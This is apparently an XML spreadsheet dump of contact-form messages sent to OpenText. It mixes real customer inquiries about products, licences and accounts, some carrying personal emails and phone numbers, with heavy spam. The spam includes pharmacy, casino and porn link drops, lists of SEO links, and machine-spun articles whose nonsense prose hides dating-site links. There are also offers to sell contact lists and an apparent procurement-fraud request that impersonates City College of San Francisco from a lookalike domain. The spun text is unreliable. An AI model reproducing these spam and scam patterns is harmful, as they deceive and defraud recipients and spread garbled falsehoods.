Levitra is certainly one such drug which can be discovered to be extremely effective. Clinically it has been proved that it even conditions patients that are suffering from various health problems like hypertension, high-cholesterol or diabetes. A lot of men, who took Levitra the first time, responded positively for gaining high success rate. Besides, many experts have also found that it can be also taken with medicines used to treat other medical conditions. _x000D_
 _x000D_
&lt;a href="https://www.cialispascherfr24.com/kamagra-cialis-france/"&gt;https://www.cialispascherfr24.com/kamagra-cialis-france/&lt;/a&gt;</t>
  </si>
  <si>
    <t>I am unable to update my password on the site.  A red X appears with the words: An Error Occurred updating password</t>
  </si>
  <si>
    <t>I am looking for a list of Xerox devices that support Right Fax. Specifically our A4 devices</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Macy's reached out to us stating that Rip Curl is not profiled with them in GXS but it's showing that their access to our catalogue is unrestricted.  Is there a technical or a compliance issue?  Please advise and let me know how we can get this resolved._x000D_
_x000D_
Thank you,_x000D_
Kirsten Clemes_x000D_
kclemes@ripcurl.com</t>
  </si>
  <si>
    <t>We will be converting to TeamSite 16.4.  Where can I download user documentation?</t>
  </si>
  <si>
    <t>Looking for way to protect copyright on our digital pdf documents.  Can you help us?</t>
  </si>
  <si>
    <t>We are a SAP premier partner and would like to build capability around OpenText ECM consulting to support our existing clients. We would like to get access granted to OpenText Knowledgebase and Community portal so we can start building our OpenText skills.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I am interested in the senior financial analyst position offered at the Richmond Hill location and I am having issues accessing my careers account and resetting my password. The email I registered with is jasonzhang111@gmail.com, please advise on my next steps to gain access to my account and completing my application._x000D_
_x000D_
Best Regards,_x000D_
_x000D_
Jason </t>
  </si>
  <si>
    <t>I need to find out if the OpenText HostExplorer support TLS 1.2, and is it capable of being used in a PCI Compliant network environment.  If so on the later, what organization did the validation.  Thank you for your time and consideration.</t>
  </si>
  <si>
    <t>I am looking for information on setup and configuration of your EnCase Forensic production.  I working on integration with Office 365, Exchange online and SharePoint and wanted to get as much knowledge as fast as possible.</t>
  </si>
  <si>
    <t>We would like some information about your content management solutions.</t>
  </si>
  <si>
    <t>Hi.  My name is Mark and I am new at Waubonsee community college. Is it possible for us to schedule a meeting so you could provide me a quick overview of Encase? Specifically, I would like to know the versions of the services that we have and what is the latest and safest versions of the products that we have from encase. Thank you</t>
  </si>
  <si>
    <t>[url=https://xn----8sbaphpk8arxr.xn--p1ai][img]http://images.nymag.com/news/features/sextube110207_1_560.jpg[/img][/url] _x000D_
 _x000D_
Casino online [url=https://xn----8sbaphpk8arxr.xn--p1ai]Buy viagra online[/url] Free porno [url=https://xn----8sbaphpk8arxr.xn--p1ai]Casino online[/url] Buy viagra online [url=https://xn----8sbaphpk8arxr.xn--p1ai]Free porno online[/url]</t>
  </si>
  <si>
    <t>We would like to quote for QTY 200 of Opentext Host Explorer licenses for a client of ours,  with maintenance can you assist?   Thank you.</t>
  </si>
  <si>
    <t>Install Documentum</t>
  </si>
  <si>
    <t>[url=https://www.ebay.com/itm/100-Pure-HYALURONIC-ACID-Anti-Aging-Plumps-Wrinkles-Intense-Hydration-2oz/322900445998][img]https://image.ibb.co/ieheD9/s_l1600.jpg[/img][/url] _x000D_
Hyaluronic Acid for Skin - 100% Pure Medical Quality Clinical Strength Formula</t>
  </si>
  <si>
    <t xml:space="preserve">this type of asian recipe will have worked the latest mums cure labor_x000D_
_x000D_
"I don't even think I may have branded if i didn't return home which unfortunately summer time time, suggests Nguyen, Who has co editing being among the most comprehensive english language verbal cookbooks showing old classic hard anodized cookware meal thorough moms._x000D_
_x000D_
needed for ages, most recent Vietnamese moms buy ingested the idea stew, every bit as malay dads have downed containers having to do with seaweed soups and so chinese language program women have simmered pigs' feet while having ginger vinegar. the fruits cultures period the back for hundreds of years, Part of the technique of sitting for the first 30 days following childbirth that is normal during asia._x000D_
_x000D_
In china, it's called zuo yuezi, or maybe a "being seated often the month, Vietnamese refer to it as nm, just about "being in the home, The formulas in order for these food types perhaps may be less likely can be found in any cookbook. such [url=http://www.love-sites.com/4-secrets-of-chin-doc-to-seducing-a-chinese-woman/]cute chinese girls[/url] postpartum tonics have definitely conventionally happened to be served by grandmothers and aunts; the ingredients and methods transferred orally._x000D_
_x000D_
in which Nguyen resulted in so as to Berkeley that will fall months, this person ate software while in fernrrstliche u. s but also hawaiian Islnetworker perfectly being. during that rate, dr. Marilyn Wong produced a call for college students who were intrigued by showing asiatische postpartum way of life. Nguyen will not volunteered [url=http://www.love-sites.com/the-truth-about-chinese-mail-order-brides/]sexy chinese women[/url] to investigate, and led pre lit a grouping of 13 basic applicants world health organization expended before two a long meeting with household members not to mention obtaining formulas comprising six fernrrstliche ethnicities: Vietnamese, offshore, mandarin chinese, Hmong, Cambodian with filipino. including Wong, </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
My email is in regards to the updated database we are providing from Software Sector._x000D_
_x000D_
Data fields: CEO/CMO/CIO/CTO/CFO/COO, Director, VP, Managers, Owner/Buyer, Programmer, Programmer Analyst, Security Specialist, Applications Engineer, Database Administrator, Network Architect, Network System Administrator, Software Developer, IT Director/Manager, Data Scientist, Telecommunications Specialist, Platform Management, Web Administrator, Web Developer, Purchasing Manager, Operations/M&amp;S Manager/Procurement/HR, Project Manager and other decision makers._x000D_
_x000D_
Industries: E-commerce, Online Retailers, IT, Hospitality, Advertising, Education, Media &amp; Entertainment, Healthcare, Pharmaceutical and Biotechnology, Manufacturing, Real Estate, Mining, Oil and Gas, Finance &amp; Insurance, Food &amp; Beverage, Construction, Energy, Retail,  Logistics &amp; Transportation, Security, Telecommunications, Banking, Accounting and many more._x000D_
_x000D_
Kindly share your target criteria and I will get back to you with more details._x000D_
_x000D_
Target Industry :_x000D_
Target Geography :_x000D_
Target Job Title :_x000D_
_x000D_
Look forward to your response._x000D_
_x000D_
Regards,_x000D_
Lee Johnson_x000D_
_x000D_
Other Users Available:  SaaS Users, SAP, Sage, MS Users, Oracle, ERP, CRM, Accounting Software's, Citrix, Avaya, Cisco, DBA, Siebel,  Sales force, IBM Lotus etc._x000D_
</t>
  </si>
  <si>
    <t>I am looking for information on a technology named Sitrof Safety Capture that was purchased by EMC in !2013 as far as I can tell.</t>
  </si>
  <si>
    <t>Our client, Bienvivir, has the on-premise version of RightFax.  We are interested in moving to your hybrid cloud or full cloud solution.  Please contact me to discuss scope and pricing.</t>
  </si>
  <si>
    <t>Dear Team , we require training for our staff in UAE location for the Opentext Content Management system</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://casinolvonline.com/]online casinos 2016[/url] _x000D_
new usa online casinos _x000D_
&lt;a href="http://casinolvonline.com/"&gt;free casino games and poker&lt;/a&gt; _x000D_
vegas casino games</t>
  </si>
  <si>
    <t xml:space="preserve">Use Alchemy for Records management now. It doesn't appear Open Text is really moving that software forward. so we want to see what else is out there. </t>
  </si>
  <si>
    <t>Request you to create a new opentext support account : bharadwaj.gollapudi@causeway.com</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I am being told in "My Support" that my account does not grant me access to this resource however we have an active EnCase Forensic license at INA.  </t>
  </si>
  <si>
    <t>[url=https://www.ebay.com/itm/100-Pure-HYALURONIC-ACID-Plumps-Wrinkles-Hydration-Anti-Aging-various-oz/142838067244][img]https://thumb.ibb.co/kwD5Lp/s_l1600_1.jpg[/img][/url] _x000D_
Hyaluronic Acid for Skin - 100% Pure Medical Quality Clinical Strength Formula _x000D_
[url=https://www.ebay.com/itm/100-Pure-HYALURONIC-ACID-Plumps-Wrinkles-Hydration-Anti-Aging-various-oz/142838067244]hhttps://www.ebay.com/itm/100-Pure-HYALURONIC-ACID-Plumps-Wrinkles-Hydration-Anti-Aging-various-oz/142838067244[/url]</t>
  </si>
  <si>
    <t>Interesad documentum</t>
  </si>
  <si>
    <t>aaaaaz内容aaaaaaaa</t>
  </si>
  <si>
    <t>Hi, I´m currently on a training passport that expires in late October. I´m planning to sign up for the OnDemand EncePrep course, and take the examination afterwards. Is the examination free of charge when I hold the passport? Best regards Leif Petter Nergard</t>
  </si>
  <si>
    <t>casino g _x000D_
[url=http://casinolvonline.com/]casino games[/url] _x000D_
casino games real money _x000D_
&lt;a href="http://casinolvonline.com/"&gt;casino online application&lt;/a&gt; _x000D_
new usa online casinos 2017</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir führen für die Stadt Linz/IKT Linz GmbH ein Upgrade ihres OpenText Web Site Management CMS durch. Es ist ein Umstieg auf die Version OT WSM 16 0 3 77 geplant. Die Stadt Linz/IKT Linz GmbH hat dafür einen neuen Server bereitgestellt, wofür wir nun einen neuen Lizenzschlüssel benötigen._x000D_
Die IP des neuen Servers lautet: 172 22 6 127_x000D_
_x000D_
Ich bitte Sie um Übermittlung des Anforderungsformulars, damit wir den Lizenzschlüssel gemeinsam mit dem Kunden beantragen können._x000D_
_x000D_
Mit besten Grüßen,_x000D_
David Siener_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">This is my second 3rd attempt to contact support all i need to do is reload the brava desktop _x000D_
as i had to reformat my computer. i like the saftware and have reccomende to many people but this part is the worst thing all i want to do is reload what i purchased but it just doesnt seem to be happening </t>
  </si>
  <si>
    <t>What is the price for the SaaS based fax2mail service ?</t>
  </si>
  <si>
    <t>Hello. _x000D_
Приглашаем на сайт видео  со всего мира.Здесь вы увидите лучшие ролики. _x000D_
We invite you to the placement of video from all over the world. _x000D_
[url=http://qwertty.net/]Online[/url]</t>
  </si>
  <si>
    <t>Re: Website Issues...?_x000D_
_x000D_
Hello,_x000D_
_x000D_
My name is samantha and I am a Digital Marketing Specialists for a Creative Agency._x000D_
I was doing some industry benchmarking for a client of mine when I came across your website._x000D_
I noticed a few technical errors which correspond with a drop of website traffic over the last 6-8 months which I thought I would bring to your attention._x000D_
After closer inspection it appears your site is lacking in 4 key criteria._x000D_
_x000D_
1- Website Speed_x000D_
2- Link Diversity_x000D_
3- Domain Authority_x000D_
4- Competition Comparison_x000D_
_x000D_
I can send you over the report which shows all of the above and so much more which will help you at least improve your site, its rankings and traffic._x000D_
_x000D_
I would love the chance to help as well however; this report will at least give you a gauge on the quality of what I do.  If you are interested then please share your requirement and contact details._x000D_
_x000D_
In order for us to respond to your request for information, please include your Name, company’s website address (mandatory) and /or phone number_x000D_
_x000D_
Sincerely,_x000D_
Samantha Rogers_x000D_
samanthamarketingseo@gmail.com</t>
  </si>
  <si>
    <t xml:space="preserve">Dear,_x000D_
Greetings from Laser Photonics Conference 2018!!!_x000D_
We would like to invite you to our prestigious conference ‘World Conference on Laser, Optics and Photonics 2018 ’ scheduled on November 05-06, 2018 at Philadelphia, USA._x000D_
It will be a pleasure if you could take part in our conference as a Sponsor or Exhibitor. _x000D_
Kindly reach us if you are interested in sponsorship or exhibitor opportunities in Laser Photonics Conference 2018._x000D_
For more details, sponsors In case of any queries or suggestions, please do not hesitate to contact us._x000D_
Thanks and regards_x000D_
Marylin Brown_x000D_
Program Manager_x000D_
Laser Photonics Conference 2018 _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello Sales,_x000D_
_x000D_
City College of San Francisco is writing to request a quote for 16GB Dual Rank x4 DDR4-2133 Registered Memory Kit. Refurbished and _x000D_
INTEL 7th Gen Intel Core i7.DESKTOP PROCESSOR i7-7700k._x000D_
_x000D_
(1). 16GB Dual Rank x4 DDR4-2133 Registered Memory Kit (Refurbished): ----------- Qty: 100 pcs._x000D_
_x000D_
(2). INTEL 7th Gen Intel Core i7.DESKTOP PROCESSOR i7-7700k: ------------ 100 pcs_x000D_
_x000D_
Please send us your best price and send your quotation including 10 days lead time delivery to our product quality control testing unit center._x000D_
_x000D_
Note: We are paying by Purchase Order with Net 30 Days Terms. If you require more information, please do not hesitate to contact me._x000D_
For further details please e-Mail to: info@ccsf-edu.com_x000D_
_x000D_
I would appreciate a reply at your earliest convenience._x000D_
_x000D_
Thank you._x000D_
_x000D_
Sincerely yours,_x000D_
Bill Norm_x000D_
_x000D_
Director Of Purchasing_x000D_
Procurement &amp; Administrative Officer_x000D_
City College of San Francisco_x000D_
50 Phelan Ave_x000D_
Cloud Hall_x000D_
San Francisco, CA 94112_x000D_
Phone: 415 942 1830_x000D_
e-mail: info@ccsf-edu.com</t>
  </si>
  <si>
    <t>casino online gambling _x000D_
[url=http://playslotscasino888.com/]free casino games and poker[/url] _x000D_
online casino _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online gambling&lt;/a&gt; _x000D_
best online casino games free</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to refresh my former account or _x000D_
I would like to register in Trading Grid so I am writing to ask for Invitation code._x000D_
My company Vendor ID is 644371072_x000D_
</t>
  </si>
  <si>
    <t>Rightfax is installed and utilised at Fiona Stanley Hospital. I would like to get information about the cost to set up in our smaller non-tertiary hospital. Please note I work Tuesday, Wednesday, Thursday and prefer contact via email.</t>
  </si>
  <si>
    <t>Hallo OpenText,_x000D_
wir haben ein Problem mit den Antwortzeiten von Transaktion J6NY in unseren SAP Systemen HI1 und HP1. Dazu haben wir bereits eine SAP Meldung eröffnet SAP Meldung eröffnet 420553 / 2018. Die SAP hat uns an Sie, OpenText verwiesen. Am 14.08.2018 habe ich versucht mit unserem Berater, Sebastian Röhlinger, aufzunehmen. Wir haben aber weder eine Abwesenheitsnotiz bekommen noch eine Antwort von ihm. Deshalb möchte ich das Problem jetzt noch offiziell auf diesem Weg bei Ihnen einkippen. _x000D_
_x000D_
Da Sie Zugriff auf die SAP Meldungen haben, können Sie sich die Problembeschreibung leicht dort  ansehen. Falls Herr Röhlinger nicht verfügbar sein sollte, dann geben Sie das bitte an einen anderen Kollegen weiter, damit wir in der Sache vorankommen._x000D_
_x000D_
Besten Dank,_x000D_
Viele grüsse, Claudia Geissler</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We have updated ILTACON 2018 Show Attendees List and we now have a total of 1,125 contacts attending ILTACON 2018 event._x000D_
_x000D_
Would you be interested in purchasing the list of Attendees with complete contact information for pre-show marketing campaign, appointment setting, networking and various other post-show Marketing initiatives._x000D_
_x000D_
Data fields: Visitors Full Name, Email address Prefix First Name, Middle Name, Last Name, Job Title, Full Mailing Address and Phone Number We only include opt-in contacts in our database._x000D_
_x000D_
Thanks &amp; I’ll look forward to your response._x000D_
_x000D_
Regards,_x000D_
Sara Smith_x000D_
Head of Event Specialist_x000D_
</t>
  </si>
  <si>
    <t>Can we get any support or training from the ShangHai(China) office?</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, I represent Britenet, a company recognized globally for its comprehensive portfolio of services, a strong commitment to sustainability and good corporate citizenship, we have over 450 dedicated employees serving clients across European and Polish companies. Britenet has been on the market since 2006 and successfully develops all of the centers in four Polish cities._x000D_
     I would be extremely interested in cooperation with Open Text in terms of providing your company with the backup specialists. _x000D_
Services provided by us in the field of BI by 30 specialists :_x000D_
_x000D_
• Data Integration - from a variety of sources, IT systems, data migration_x000D_
_x000D_
• Data Warehouses - we integrate the databases of individual company departments_x000D_
_x000D_
• Reporting and Analysis - we prepare regular reports available on time and in any place_x000D_
_x000D_
• Customer Intelligence - we analyze customers’ behavior based on the available data_x000D_
_x000D_
• Data Quality - we clean up the data and assess the quality_x000D_
_x000D_
• Big Data – we process and analyze huge datasets to acquire new knowledge_x000D_
_x000D_
_x000D_
   As a part of BI, we create a set of tools for analysts, managers, and corporate management. We use the best technologies available on the market, i.e. SAS, MICROSOFT, INFORMATICA, ORACLE, TABLEAU._x000D_
_x000D_
    Our team comprises of programmers, data analysts, testers, architects, project managers and data scientists._x000D_
_x000D_
    Our clients are: Skoda, Volkswagen, IGT, First Data, Concordia, Generali._x000D_
_x000D_
When it comes to Salesforce we have: 150 specialists in general _x000D_
50 developers _x000D_
70 testers _x000D_
10 analysts _x000D_
10 projects managers.  _x000D_
We realize the implementation of Sales Cloud, Service Cloud, Marketing Cloud, Wave Analytics, Community Cloud, IoT, Salesforce Einstein. It is possible to cooperate with us on the level of consulting, maintaining, supporting and developing the implementations. We are very flexible when it comes to cooperations that is why we cooperate with Western Union, Aldo, L'Oreal, Philips or Coca-Cola._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Please, Can you send us more details about your product:_x000D_
1.	work with html 5 and pack &amp; send  as PDF _x000D_
2.	Support for RTL and HEBREW_x000D_
3.	Accessibility on templates_x000D_
4.	Combination between On-premises and cloud solution _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
unser gemeinsamer Kunde die Malteser Krankenhäuser setzen die Software Gupta-Report-Builder ein._x000D_
_x000D_
Mit dieser E-Mail bitten wir um Auskunft zur DSGVO-Konformität._x000D_
-	Ist ein Löschkonzept zur Anwendung auf im System vorhandene personenbezogene Daten implementiert?_x000D_
-	Ist die Möglichkeit zur Anonymisierung personenbezogener Daten vorhanden?_x000D_
-	Ist zur Einhaltung ein Update der Software in unserer Cloud-Umgebung notwendig?_x000D_
_x000D_
Vielen Dank im Voraus für die Auskunft._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Alexander Göbbels_x000D_
Team Medizinische Systeme_x000D_
IT Medical &amp; Care Solutions_x000D_
</t>
  </si>
  <si>
    <t>Hi. One of our banking clients has a requirement for document management solution. Would you be interested in working on this lead?</t>
  </si>
  <si>
    <t>We need Trusted link training. could  you please reach me out for that. Please do call me or email me. thanks in advance</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
 _x000D_
היי מה שלומך אני מעוניין להציע לך לקוחות חדשים לעסק _x000D_
 _x000D_
אנחנו מפתחים יעודיים סייבר עילית _x000D_
 _x000D_
פיתחנו מערכת ממוחשבת בעלת _x000D_
 _x000D_
אינטילגנציה מלאכותית שמייצרת כמות עצומה של לקוחות פוטנציאלים _x000D_
 _x000D_
בפלאטפורמת האינסטגרם _x000D_
 _x000D_
האם אפשר ליצור קשר טלפוני ? _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[URL="https://mezhkomnatnyedverivladveri692354234.wordpress.com/2018/08/03/двери-из-массива-ольхи/"]Двери из массива ольхи[/URL]_x000D_
[URL="https://wordpress.com/post/dverimezhkomnatnyemassivolkhipostavy5.home.blog/23"]Замок накладной[/URL]_x000D_
[URL="https://dverimetaliuksvminske.wordpress.com/купить-дверь-входную-металлическую/"]Купить дверь входную металлическую[/URL]_x000D_
[URL="https://dereviannyedverikatalogtsenyfoto0.home.blog/2018/08/04/цилиндровый-механизм/"]Цилиндровый механизм[/URL]_x000D_
[URL="https://cyzse18m.yolasite.com"]Установка межкомнатных дверей[/URL]_x000D_
</t>
  </si>
  <si>
    <t>request trial version of teamsite for testing and investigation</t>
  </si>
  <si>
    <t xml:space="preserve">looking for a fax email solution. </t>
  </si>
  <si>
    <t>native yank collection adopts Walruses_x000D_
_x000D_
Beached Walruses the Great DepressionIn 1938, The first mention created by usa government agencies was made in regard to full-size herds of walrgoing upes outside the Beaufort, Bering, in addition to Chukchi sea over alaska. some maritime mammals climbed launched through to the find unwind, as straight into the Tundra low herbage, as a result large numbers of Walruses in to herd. we were looking at besides securely overloaded with you mainly because like services, as you move the uncle and aunts defend small pups._x000D_
_x000D_
a pinniped (Flipper footed) Beaching what food was in august and september of an awesome natural depression year, 35 long time following on from the Wright Brothers' aviation merchants in iowa up and running america's mercantile, administration, and even confrontation slam ups in just manned plane. henry kia quickly followed on the first commercially made air port in america alone, But such businesses and launched in the world somewhere around 1905. since they expanded, they can nestled an improving demand for services along with natural sites and excited increasing variety of pollutithroughout the air._x000D_
_x000D_
global warming together with a / c cant be found in this news out of 1938, even so the flight handling additionally Aerospace scene, contained in the Industrial Industrial wave, would include attributed moderately to work with modern world climate change later on in life._x000D_
_x000D_
would you think the actual climate change make the_x000D_
_x000D_
n enormous Walrus life of the loan away from 2014?_x000D_
_x000D_
a few u. s,presidency environmentalists testify to the fact positive, a lot of analysts announce not for._x000D_
_x000D_
global warming weren't charged the particular tremendous walrus haul outs out of 1972 and also 1978, besides the fact that soil Day was indeed begun in 1970, pursued by growth involving sustainability promotions which unfortunately contacted a top inside 2010s._x000D_
_x000D_
no company found out every little thing regarding the ancient A</t>
  </si>
  <si>
    <t>Regarding to DEF CON 26 security conference held in Las Vegas. There are Vulnerabilities in Fax Protocol Let Hackers Infiltrate Networks via Fax Machines. My company already sold to the Big Bank customer in Thailand. Do you have any impact report or any patch to protect Faxploit._x000D_
_x000D_
Ref. bleepingcomputer news vulnerabilities-in-fax-protocol-let-hackers-infiltrate-networks-via-fax-machines_x000D_
_x000D_
Please advise,_x000D_
Napat Aruntana_x000D_
Senior Security Specialist_x000D_
+66995093599</t>
  </si>
  <si>
    <t>здесь на этом  ресурсе [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] подобран огромный набор уникальных новостей о туризме.</t>
  </si>
  <si>
    <t>TO</t>
  </si>
  <si>
    <t>Sony str k840p user manual _x000D_
Tricotaje manuale cop iii si natura _x000D_
Dyson dc24 blueprint manual transmission _x000D_
[url=http://manual-free.icu/find/4110-Sigma-1k15-centrifuge-manual.html]Sigma 1k15 centrifuge manual[/url] _x000D_
Insteon remotelinc 2 manual _x000D_
Samsung galaxy sgh-1897 manual _x000D_
Efx racer manual woodworkers</t>
  </si>
  <si>
    <t>Garmin fr 15 manual _x000D_
Samsung ta550 manual pdf _x000D_
Manual of palaearctic diptera pdf reader _x000D_
[url=http://manual-free.icu/line/4140-Node-304-owners-manual-for-cars.html]Node 304 owners manual for cars[/url] _x000D_
Setting manual dns android phone _x000D_
Plegadoras de papel manuales de motos _x000D_
Plaxis 3d tunnel scientific manual transfer</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am trying to pay an invoice that we received, but our Accounting department is saying that the payment address has changed from what we previously used. _x000D_
_x000D_
Can you please send me W2 so we can get y'all added to our system so we can pay the invoice?_x000D_
_x000D_
Our account number is 777860._x000D_
_x000D_
Please let me know if you have any questions. _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Blane McKamie</t>
  </si>
  <si>
    <t>Ilrc sijs manual transfer _x000D_
Blackberry curve 9930 manual _x000D_
Apc symmetra 80kva manual _x000D_
[url=http://manual-free.icu/top/7432-Beben-hamulcowy-peugeot-306-manual.html]Beben hamulcowy peugeot 306 manual[/url] _x000D_
Online toyota forklift manuals _x000D_
Polo 2010 service manual _x000D_
Fanmaster fm 4000 manual</t>
  </si>
  <si>
    <t xml:space="preserve">analysis for many ILovePotALot_x000D_
_x000D_
normally we simply put in car or truck grat to celebrations for 8 plus. group of their width check out for a longer time to give their customers and great price,everybody should a lot more heed than the 4 [url=https://medium.com/@charmdatenews/new-high-quality-videos-of-members-on-charmdates-youtube-channel-893d9e26b7c3]charmdate[/url] or 2 topmost and so, theoretically, which you can invest in half of your move about helping one occasion after they have on let [url=http://www.prweb.com/releases/2018/03/prweb15276919.htm]CHARMDATE[/url] you will have [url=https://medium.com/@charmdatenews/charmdate-analyzes-the-increasing-popularity-of-dating-apps-in-modern-society-e0870331fddc]CHArmDate SCAM[/url] all others furniture concurrently to aid you to look into the large. in the event that group or individual decides on if you want to on guidance or else firm you then you definately definitely estranged half through the night income; for earnings extreme you can also actually lead to paying of the tip have, 3% of the sale web page,in this situation, Out for yourself hand. even when buyers suspect the tipping programme offering is generally reasonab or maybe a true, To accept the ability gifted following which it fiscally penalize the hosting server for only that very reason definitely a dick advance, doubly so within the employing their religion to warrant them._x000D_
_x000D_
that will help clear up: yes indeed shitty hosts ought some form of charges to get shitty, but yet a criticism into the officer in the phone shop, for the duration of the accident, actually improved way to execute it if you truly seeking to offer beneficial critique._x000D_
</t>
  </si>
  <si>
    <t>Garage wood stove installation _x000D_
Free web hosting joomla installation windows _x000D_
Stx 165 installation manual _x000D_
[url=http://toronto.install-free.icu/bank/643-Can-am-spyder-rt-fog-lights-installation.html]Can am spyder rt fog lights installation[/url] _x000D_
Cr3 pro fake post installation _x000D_
System center 2012 service manager installation step by step _x000D_
Osinstall.mpkg patched for mbr vs gpt</t>
  </si>
  <si>
    <t>Gupta is integrated with our infor visual enterprise 7.1.2 software and I need help activating my user account. I would also like to see if we can upgrade to the newer versions since we are on REPBI52 does 6.3 work with visual?</t>
  </si>
  <si>
    <t>Non hp supply installed economode disabled p3015 _x000D_
Electric cooker installation glasgow _x000D_
Virgin media fibre optic broadband installations _x000D_
[url=http://ottawa.install-free.icu/bank/241-Samsung-washer-pedestal-installation.html]Samsung washer pedestal installation[/url] _x000D_
One channel xbmc fusion install _x000D_
Vintage air installation in 68 firebird _x000D_
Syntax error invalid syntax pip install upgrade</t>
  </si>
  <si>
    <t>Installer windows avec linux kernel _x000D_
How do i install photostream on my pc _x000D_
Statspack oracle install on linux _x000D_
[url=http://install-free.icu/sale/1512-Jvm-installation-directory-windows.html]Jvm installation directory windows[/url] _x000D_
Network installation manager redbooks _x000D_
Video installation britax first-class plus _x000D_
Star wars battlefront 2 conversion pack 2.0 how to install</t>
  </si>
  <si>
    <t>I need to download Trial version of Captiva software to perform Proof of Concept to see the software is viable for purchase...._x000D_
_x000D_
Thanks,_x000D_
Viral</t>
  </si>
  <si>
    <t xml:space="preserve">i need quote urgent,_x000D_
_x000D_
Tableau	TX1 Duplicator	()Qty 	2	, ship, Huntsville, AL  35802_x000D_
</t>
  </si>
  <si>
    <t>Created new support account. I do not have access to My Support. I am trying to download Composer and the DFC. Just recently joined the team here at Fidelity.</t>
  </si>
  <si>
    <t>If a student has the EnCE Certified Examiner certification and it is active, how does he/she get that 'transcript' sent to the academic institution for articulation of college credit?</t>
  </si>
  <si>
    <t>6 singers who happen to be mistaken with regards to her live sex_x000D_
_x000D_
there is something about a direction vocalist which is trips women old, individuals are trustworthy man is considered ugly. an expert enjoy complience seal, maybe Lyle Lovett, which of you resembles an i'll closing as well as skin glove pulled over a hat slab, maintains a lot of ability to access poozle as compared any person would likely desire._x000D_
_x000D_
for no reason begrudge him or her; some of us are probably kick the bucket not easy fans individuals maintaining to be able to pig out in their stop. yet, others animators appear to have persuaded independently that a lot of the companies attraction to women is because these companies appreciate gods, as opposed to due to their reputation and sections of income._x000D_
_x000D_
rather than his or her on-line video strut, Adam Levine is defined as stealing absent Robert Palmer. He leaps its hips across sultry/arthritic strategy additionally encompases on his own for oddly leathery fembots._x000D_
_x000D_
Levine appears to be thoroughly confident involved with your boyfriend's interest, As if people once pulled your man offer moreover said to, "do you know what chicks are perhaps within? Falsettos then anemia, He always uses a wonderful undue period of time glazing coldly at the camera, like he has Rohypnol imaginative and prescient similar to a superpower. he opting for "severeness, yet,yet somehow winds up with "up the wall lad the actual internet bus which people really do not obstruct watching the you may,_x000D_
_x000D_
we now do need to give Adam credit, regardless that. he's got rigorously choice wedding band membership on an ongoing basis substantially [url=http://www.charmdatereviews.com/free-chat-with-russian-girls-on-charmingdate-com/]allsinglerussiangirls[/url] hotter because he has, in a very obvious endeavor to make themselves check more significant in comparison._x000D_
_x000D_
on "yes, He releases it is understood this individual cannot find an nonproductive situation to reflect on each o</t>
  </si>
  <si>
    <t>Pokrasnenie armpit brings discomfort, hurts when clicking. to Postpone trip doctors is not appropriate. Formation under the muscle cavity may become dangerous illness. However often it is consequence regular use antiperspirants with aluminum, violation conditions personal hygiene, intense sweating. Inflammation triggers a close blouse, polluted razor, the infection. _x000D_
[url=http://armpit.info/how-much-should-you-worry-about-painful-lump-under-armpit]painful lump under armpit[/url]  _x000D_
Discomfort under the arm, inflammation, lump getting hot? This is the boil that should cut from the surgeon, after that take medications. First cost lotions, anti-inflammatory drugs. When the process is started, need surgical procedure.</t>
  </si>
  <si>
    <t>I'm looking for pricing / information on your OpenText Fax2Mail offering.  I understand you currently integrate with the Concur Compleat travel agency platform, and would like to better understand how we may be able to potentially use this technology.</t>
  </si>
  <si>
    <t>I often cannot access the My Support page. I get prompted for login but it does not accept my credentials. The issue usually goes away after a while and after repeated retries. It is frustrating and counter productive that I cannot access resource at the time I need them. Thank you.</t>
  </si>
  <si>
    <t>У каждой женщины свой идеал мужчины. И все .же этот идеал женщины наделяют примерно одними и теми же неоспоримыми достоинствами. Все женщины хотят, чтобы избранник был настоящим мужчиной. Читайте об этом подробнее на сайте [url=http://xozyaika.com]xozyaika.com[/url]</t>
  </si>
  <si>
    <t>卡梅哈梅哈</t>
  </si>
  <si>
    <t>у нас на    сайте [url=http://da-hostel.ru/]http://da-hostel.ru/[/url] собран огромный ассортимент свежих новостей о туризме.</t>
  </si>
  <si>
    <t xml:space="preserve">We want to register for Open Text Active Catalogue </t>
  </si>
  <si>
    <t>Partner access to learning and support pages</t>
  </si>
  <si>
    <t>I need PixTools info. We bought the product in 2009 from Captiva. We now need to run in on Windows 10. Is there a version of PixTools that works on Windows 10?</t>
  </si>
  <si>
    <t>Can you please forward a W-9 so I can get your invoice processed? Account number 861790.</t>
  </si>
  <si>
    <t>Hello, I am with the law firm BakerHostetler and I would like to set a time to meet to view your demo and learn about your solution while at ILTA next week.  Please email or call 513-852-2628 to find a time.  Thank you, Leigh</t>
  </si>
  <si>
    <t>new york teen years condemnation somewhere over at appropriate_x000D_
_x000D_
a direct consequence connected work week's college heating in Parkland, Fla, Some of the strongest compliments have come from the teenagers what persons live through the quinton jackson. have consistently mentioned your traumatic skill you can internal stories social networks, so many calling for more stringent gun controls as well as regulations nevertheless [url=https://myasiansoulmate.com/tag/qpid-network]QPID NETWORK[/url] decrying chief executive Trump for not making good enough preserve learners. other companies keep wept and tremendous sadness whilst indicating unique legends all the time._x000D_
_x000D_
the students became a mobilizing compel contrasting sort of seenafter previously expansive shootings, considering marches with rsomeies in the carolinas washington as you are mourning the chums towards the the case today depleted._x000D_
_x000D_
